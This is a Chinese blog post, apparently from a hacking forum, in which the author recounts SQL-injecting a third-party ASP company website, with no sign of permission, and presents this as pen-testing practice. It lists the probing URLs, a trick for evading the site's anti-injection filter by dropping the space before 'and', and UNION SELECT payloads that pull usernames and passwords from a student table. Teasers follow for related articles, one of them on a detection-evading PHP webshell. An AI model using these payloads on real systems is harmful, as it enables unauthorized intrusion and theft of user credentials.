今天无聊在帮一个站做渗透测试的时候,旁注找到一个asp企业站,asp好站拿点嘛,所以还是非常开心的,其中一个asp站,有这样的链接:
http://www.xxx.cn/news_list.asp?news_id=1165
目测一般都有漏洞,加个单引号看看,啪地弹出一个框,尿都吓出来了
现在好多的ASP网站由于都存在注入等问题,于是都装备了这种先进的注入系统,所以你一般看到有反注入系统的站后面都是存在注入漏洞的,能bypass反注入就搞定了,不过一般这些反注入系统都很垃圾,很多没有过滤cookie注入,或者随便改下注入语句就能绕过了,下面的烂大街语句肯定都被拦截了。
http://www.xxx.cn/news_list.asp?news_id=1165 and 1=1
http://www.xxx.cn/news_list.asp?news_id=1165 and 1=2
http://www.xxx.com /news_list.asp?news_id=1165 and 666=666
让我感到震撼的是,居然order by 没有拦截,完全是一个没有节操的防注入系统啊,用order by确定了字段数是9,过滤了and,采用编码绕过也没有成功,试了几次,我发现它过滤的特征是”空格+and“,那么我们索性不要空格了,直接这样写:
http://www.xxx.cn/news_list.asp?news_id=1165and 1=1
http://www.xxx.cn/news_list.asp?news_id=1165and 1=2
嘿嘿嘿, *** 了吧,成功绕过了,网上说的绕过技巧很多,可是好像没有提过这种 *** ,虽然绕过了可惜猜不出管理员表,只猜出了用户表,union一下,还是可以查出来的。
http://www.xxx.cn/news_list.asp?news_id=1165and 1=2 union select 1,2,3,4,5,6,7,8,9 from student
http://www.xxx.cn/news_list.asp?news_id=1165and 1=2 union select 1,2,student_name,4,5,6,student_password,8,9 from student
对它的库也没兴趣,纯属练手而已,完。
原文地址: http://fsecurify.com/how-to-learn-hacking/ 如何学习黑客技术? 这个问题我几乎每天都会在Quora、Facebook、Twitter和现实生活...
留意:全部这种专用工具全是捆缚在一起的Linux发行版,如Kali Linux或BackBox,因此大家一定会建议安裝一个适合的Linux网络黑客系统软件,使您的日常生活更轻轻松松 - 特别是在是由...
一个能够绕开当今目前市面上基本上全部Webshell查杀的免杀PHP一句话木马脚本制作。...
什么叫OpenVAS? OpenVas是一个完全免费的漏洞检测程序流程,该专用工具在2006年的专用工具合理合法后才从最后一个漏洞检测程序流程(Nessus)的完全免费版本号中删掉。OpenVAS的...
在《黑客基础术语:什么是命令行和环境变量?》本文里我讲过什么叫SHELL?大伙儿能够温故一下。本文章内容是这一系列产品的第五篇,主要讲一下什么是黑客里的互动式SHELL及其在非互动式SHELL里怎样...
参考官方手册 http://static.tenable.com/documentation/nessus_5.0_user_guide.pdf Nessus是世界上最流行的...